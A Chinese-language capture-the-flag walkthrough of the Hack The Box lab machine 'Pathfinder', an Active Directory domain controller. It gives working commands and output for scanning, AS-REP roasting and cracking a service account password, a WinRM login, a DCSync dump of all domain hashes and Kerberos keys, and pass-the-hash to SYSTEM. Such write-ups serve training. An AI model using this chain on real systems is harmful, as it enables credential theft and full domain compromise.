直接使用masscan+nmap进行端口扫描
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64] └─$ sudo masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-17 08:09:16 GMT Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 47001/tcp on 10.10.10.30 Discovered open port 49664/tcp on 10.10.10.30 Discovered open port 9389/tcp on 10.10.10.30 Discovered open port 49667/tcp on 10.10.10.30 Discovered open port 49671/tcp on 10.10.10.30 Discovered open port 49718/tcp on 10.10.10.30 Discovered open port 49666/tcp on 10.10.10.30 Discovered open port 49677/tcp on 10.10.10.30 Discovered open port 49683/tcp on 10.10.10.30 Discovered open port 135/tcp on 10.10.10.30 Discovered open port 3268/tcp on 10.10.10.30 Discovered open port 88/tcp on 10.10.10.30 Discovered open port 3269/tcp on 10.10.10.30 Discovered open port 53/tcp on 10.10.10.30 Discovered open port 49665/tcp on 10.10.10.30 Discovered open port 5985/tcp on 10.10.10.30 Discovered open port 139/tcp on 10.10.10.30 Discovered open port 445/tcp on 10.10.10.30 Discovered open port 49676/tcp on 10.10.10.30 Discovered open port 636/tcp on 10.10.10.30 Discovered open port 593/tcp on 10.10.10.30 Discovered open port 389/tcp on 10.10.10.30 Discovered open port 49698/tcp on 10.10.10.30 Discovered open port 464/tcp on 10.10.10.30
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64] └─$ nmap -sC -sV 10.10.10.30 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 16:12 CST Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 67.60% done; ETC: 16:13 (0:00:05 remaining) Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 93.35% done; ETC: 16:13 (0:00:01 remaining) Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 27.27% done; ETC: 16:13 (0:00:16 remaining) Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 81.82% done; ETC: 16:13 (0:00:05 remaining) Nmap scan report for 10.10.10.30 Host is up (0.28s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-17 15:20:57Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h07m30s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-07-17T15:21:14 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 69.82 seconds
目标开放端口众多,但重点在于开放了ldap、kpasswd5以及kerberos-sec服务,借此可以判断目标为一台活动目录(Active Directory)服务器。
根据Nmap对ldap相关端口的扫描结果可以获得Domain: MEGACORP.LOCAL0.
先来介绍下要用到的工具LDAPDomainDump:LDAPDomainDump是一款通过LDAP实现的活动目录信息收集工具。在一个活动目录域中,任何一名认证用户都可以通过LDAP来获取大量有价值的信息。
可知使用该工具需要一名认证用户,由于startpoint系列的主机之间存在关联,刚好在上一个目标中获取到了一份用户名口令:sandra Password1234!,正好用在这里:
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64] └─$ ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished
输出结果为html格式,domain_users.html输出如下,可以看到存在5个账户,其中Guest,Administrator和krbtgt是默认账户,sandra和svc_bes是用户创建的账户。需要注意的是,svc_bes账户具备DONT_REQ_PREAUTH这一标志位
此处涉及到kerberos认证的相关知识,为便于理解在此简要介绍下
上图是kerberos的认证流程,若某个用户的flag位为DONT_REQ_PREAUTH,则无需进行第2步与第3步的认证过程,也就意味着可以通过该用户直接请求服务票据(service ticket)
现在使用impacket工具包中的GetNPUsers.py来获取服务票据,如果没有安装impacket工具包,运行以下命令安装:
sudo -s cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket sudo python3 -m pip install . sudo python3 setup.py install cd examples/
使用GetNPUsers获取svc_bes的服务票据,输出为john可用的格式
几个选项涵义如下:
-request : Requests TGT for users and output them in JtR/hashcat format (default False) -no-pass : Don't ask for password (useful for Kerberos authentication) -dc-ip : IP Address of the domain controller. -format : Format to save the AS_REQ of users without pre-authentication. Default is hashcat
john爆破结果如下,获取svc_bes口令:Sheffield19
┌──(bob㉿woo)-[~/ldapinfo] └─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:04 16.51% (ETA: 17:07:35) 0g/s 645043p/s 645043c/s 645043C/s yogismom..yoellia14 Sheffield19 ($krb5asrep$svc_bes@MEGACORP.LOCAL) 1g 0:00:00:15 DONE (2021-07-17 17:07) 0.06459g/s 684981p/s 684981c/s 684981C/s Sherbear94..Shawne116 Use the "--show" option to display all of the cracked passwords reliably Session completed
现在我们有了svc_bes的口令,又由于目标开启了5985端口(WinRM服务,WindowsRemoteManagementd,即windows远程管理),因此可使用evil-winrm工具进行远程管理,未安装的话可使用命令:gem install evil-winrm来安装。登陆后,便可获得user级的flag
┌──(bob㉿woo)-[~/ldapinfo] └─$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30 Evil-WinRM shell v2.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_bes> cd Desktop *Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt b05fb166688a8603d970c6d033f637f1
使用bloodhound-python工具获取的四个json文件拖拽到bloodhound中,开始分析。可以执行各种分析,但最有用的分析是Shortest Paths to High value Targets (高价值目标最短路径)和Find Principles with DCSync Rights(查找具有DCSync权限的原则)。在Find Principles with DCSync Rights的查询结果显示,svc_bes对域控服务器具有GetChangesAll权限,这意味着该账号能够请求从域控服务器复制数据并获得注入用户哈希之类的敏感信息。此处参考(https://blog.csdn.net/qianxiaoyiran311/article/details/106027299)
使用impacket工具包中的secretsdump.py进行DCSync攻击并转储所有域用户的NTLM哈希值。NTLM凭证由域名、用户名及在最初登录时所输入的加密口令所组成
┌──(bob㉿woo)-[~/Zones] └─$ secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30 Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3::: svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca::: sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d::: PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:70f577ff8a6a3fdc985b9933b0964beb::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b Administrator:des-cbc-md5:f1c89e75a42cd0fb krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce krbtgt:des-cbc-md5:d0f8d0c86ee9d997 svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238 svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0 svc_bes:des-cbc-md5:1cc16e37ef8940b5 sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810 sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44 sandra:des-cbc-md5:23988f7a9d679d37 PATHFINDER$:aes256-cts-hmac-sha1-96:63f54baad343b721e1fafb11f02df20e6ad06292cab9db214338f5bc02de094a PATHFINDER$:aes128-cts-hmac-sha1-96:03e78b35c1feb2be71b7953087333648 PATHFINDER$:des-cbc-md5:61b091839ee9e35d [*] Cleaning up...
通过secretsdump成功获取Administrator用户的哈希值,可以进行PTH攻击(哈希传递攻击)以获取系统访问权限。此处使用Impacket工具包的psexec.py进行
┌──(bob㉿woo)-[~/Zones] └─$ psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18 Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation [*] Requesting shares on 10.10.10.30..... [*] Found writable share ADMIN$ [*] Uploading file yFPortAS.exe [*] Opening SVCManager on 10.10.10.30..... [*] Creating service fReT on 10.10.10.30..... [*] Starting service fReT..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Users\Administrator\Desktop>type root.txt ee613b2d048303e5fd4ac6647d944645
参考链接:
https://shapmanasick.gitbook.io/starting-point-htb/pathfinder-walkthrough
https://blog.csdn.net/qianxiaoyiran311/article/details/106027299